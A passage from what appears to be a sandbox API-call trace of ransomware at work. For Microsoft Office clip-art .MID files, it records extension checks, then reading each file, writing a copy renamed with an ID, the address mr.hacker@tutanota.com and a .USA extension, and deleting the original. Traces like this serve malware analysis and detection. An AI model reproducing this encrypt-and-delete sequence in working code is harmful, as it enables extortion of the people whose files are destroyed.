63 [0268.344] lstrlenW (lpString=".dbf") returned 4 [0268.344] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.344] lstrlenW (lpString=".1cd") returned 4 [0268.344] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.344] lstrlenW (lpString=".jpg") returned 4 [0268.344] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.344] lstrlenW (lpString=".doc") returned 4 [0268.344] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.344] lstrlenW (lpString=".docx") returned 5 [0268.344] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.344] lstrlenW (lpString=".pdf") returned 4 [0268.344] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.344] lstrlenW (lpString=".xls") returned 4 [0268.344] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.344] lstrlenW (lpString=".xlsx") returned 5 [0268.344] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.345] lstrlenW (lpString=".ppt") returned 4 [0268.345] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.345] lstrlenW (lpString=".zip") returned 4 [0268.345] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.345] lstrlenW (lpString=".rar") returned 4 [0268.345] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.345] lstrlenW (lpString=".bz2") returned 4 [0268.345] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.345] lstrlenW (lpString=".7z") returned 3 [0268.345] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.345] lstrlenW (lpString=".dbf") returned 4 [0268.345] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.345] lstrlenW (lpString=".1cd") returned 4 [0268.345] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.345] lstrlenW (lpString=".jpg") returned 4 [0268.345] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.345] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.345] lstrlenW (lpString="PARNT_01.MID") returned 12 [0268.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.346] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=6491) returned 1 [0268.346] CloseHandle (hObject=0x348) returned 1 [0268.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid")) returned 0x20 [0268.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.346] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.346] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.347] GetLastError () returned 0x0 [0268.347] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x195b, lpOverlapped=0x0) returned 1 [0268.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1960, lpOverlapped=0x0) returned 1 [0268.365] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.365] SetEndOfFile (hFile=0x2b4) returned 1 [0268.366] CloseHandle (hObject=0x2b4) returned 1 [0268.366] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.366] SetEndOfFile (hFile=0x348) returned 1 [0268.371] CloseHandle (hObject=0x348) returned 1 [0268.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid")) returned 1 [0268.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.379] lstrlenW (lpString=".doc") returned 4 [0268.379] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.379] lstrlenW (lpString=".docx") returned 5 [0268.379] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.379] lstrlenW (lpString=".pdf") returned 4 [0268.379] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.379] lstrlenW (lpString=".xls") returned 4 [0268.379] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.379] lstrlenW (lpString=".xlsx") returned 5 [0268.379] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.379] lstrlenW (lpString=".ppt") returned 4 [0268.379] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.379] lstrlenW (lpString=".zip") returned 4 [0268.379] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.379] lstrlenW (lpString=".rar") returned 4 [0268.379] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.379] lstrlenW (lpString=".bz2") returned 4 [0268.379] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.379] lstrlenW (lpString=".7z") returned 3 [0268.379] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.379] lstrlenW (lpString=".dbf") returned 4 [0268.379] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.379] lstrlenW (lpString=".1cd") returned 4 [0268.379] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.379] lstrlenW (lpString=".jpg") returned 4 [0268.379] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.380] lstrlenW (lpString=".doc") returned 4 [0268.380] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.380] lstrlenW (lpString=".docx") returned 5 [0268.380] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.380] lstrlenW (lpString=".pdf") returned 4 [0268.380] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.380] lstrlenW (lpString=".xls") returned 4 [0268.380] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.380] lstrlenW (lpString=".xlsx") returned 5 [0268.380] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.380] lstrlenW (lpString=".ppt") returned 4 [0268.380] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.380] lstrlenW (lpString=".zip") returned 4 [0268.380] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.380] lstrlenW (lpString=".rar") returned 4 [0268.380] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.380] lstrlenW (lpString=".bz2") returned 4 [0268.381] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.381] lstrlenW (lpString=".7z") returned 3 [0268.381] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.381] lstrlenW (lpString=".dbf") returned 4 [0268.381] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.381] lstrlenW (lpString=".1cd") returned 4 [0268.381] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0268.381] lstrlenW (lpString=".jpg") returned 4 [0268.381] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.381] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.381] lstrlenW (lpString="PARNT_02.MID") returned 12 [0268.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.381] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=5714) returned 1 [0268.381] CloseHandle (hObject=0x348) returned 1 [0268.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid")) returned 0x20 [0268.382] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.382] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.382] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.382] GetLastError () returned 0x0 [0268.382] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1652, lpOverlapped=0x0) returned 1 [0268.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1660, lpOverlapped=0x0) returned 1 [0268.388] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.388] SetEndOfFile (hFile=0x2b4) returned 1 [0268.388] CloseHandle (hObject=0x2b4) returned 1 [0268.388] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.388] SetEndOfFile (hFile=0x348) returned 1 [0268.390] CloseHandle (hObject=0x348) returned 1 [0268.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.391] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid")) returned 1 [0268.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.391] lstrlenW (lpString=".doc") returned 4 [0268.391] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.391] lstrlenW (lpString=".docx") returned 5 [0268.391] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0268.391] lstrlenW (lpString=".pdf") returned 4 [0268.391] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.391] lstrlenW (lpString=".xls") returned 4 [0268.391] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.391] lstrlenW (lpString=".xlsx") returned 5 [0268.391] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0268.391] lstrlenW (lpString=".ppt") returned 4 [0268.391] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.391] lstrlenW (lpString=".zip") returned 4 [0268.391] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.391] lstrlenW (lpString=".rar") returned 4 [0268.391] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.391] lstrlenW (lpString=".bz2") returned 4 [0268.391] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.391] lstrlenW (lpString=".7z") returned 3 [0268.392] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.392] lstrlenW (lpString=".dbf") returned 4 [0268.392] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.392] lstrlenW (lpString=".1cd") returned 4 [0268.392] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.392] lstrlenW (lpString=".jpg") returned 4 [0268.392] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.392] lstrlenW (lpString=".doc") returned 4 [0268.392] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.392] lstrlenW (lpString=".docx") returned 5 [0268.392] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0268.392] lstrlenW (lpString=".pdf") returned 4 [0268.392] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.392] lstrlenW (lpString=".xls") returned 4 [0268.392] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.392] lstrlenW (lpString=".xlsx") returned 5 [0268.392] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0268.392] lstrlenW (lpString=".ppt") returned 4 [0268.392] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.393] lstrlenW (lpString=".zip") returned 4 [0268.393] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.393] lstrlenW (lpString=".rar") returned 4 [0268.393] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.393] lstrlenW (lpString=".bz2") returned 4 [0268.393] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.393] lstrlenW (lpString=".7z") returned 3 [0268.393] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.393] lstrlenW (lpString=".dbf") returned 4 [0268.393] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.393] lstrlenW (lpString=".1cd") returned 4 [0268.393] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0268.393] lstrlenW (lpString=".jpg") returned 4 [0268.393] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.393] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.393] lstrlenW (lpString="PARNT_03.MID") returned 12 [0268.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.394] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=8538) returned 1 [0268.394] CloseHandle (hObject=0x348) returned 1 [0268.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid")) returned 0x20 [0268.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.394] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.394] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.395] GetLastError () returned 0x0 [0268.395] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x215a, lpOverlapped=0x0) returned 1 [0268.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x2160, lpOverlapped=0x0) returned 1 [0268.397] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.397] SetEndOfFile (hFile=0x2b4) returned 1 [0268.397] CloseHandle (hObject=0x2b4) returned 1 [0268.397] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.397] SetEndOfFile (hFile=0x348) returned 1 [0268.400] CloseHandle (hObject=0x348) returned 1 [0268.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid")) returned 1 [0268.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.401] lstrlenW (lpString=".doc") returned 4 [0268.401] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.401] lstrlenW (lpString=".docx") returned 5 [0268.401] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1 [0268.401] lstrlenW (lpString=".pdf") returned 4 [0268.401] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.401] lstrlenW (lpString=".xls") returned 4 [0268.401] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.401] lstrlenW (lpString=".xlsx") returned 5 [0268.401] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1 [0268.401] lstrlenW (lpString=".ppt") returned 4 [0268.401] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.401] lstrlenW (lpString=".zip") returned 4 [0268.401] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.401] lstrlenW (lpString=".rar") returned 4 [0268.401] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.401] lstrlenW (lpString=".bz2") returned 4 [0268.401] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.401] lstrlenW (lpString=".7z") returned 3 [0268.401] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.401] lstrlenW (lpString=".dbf") returned 4 [0268.401] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.401] lstrlenW (lpString=".1cd") returned 4 [0268.402] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.402] lstrlenW (lpString=".jpg") returned 4 [0268.402] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 63 [0268.402] lstrlenW (lpString=".doc") returned 4 [0268.402] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.402] lstrlenW 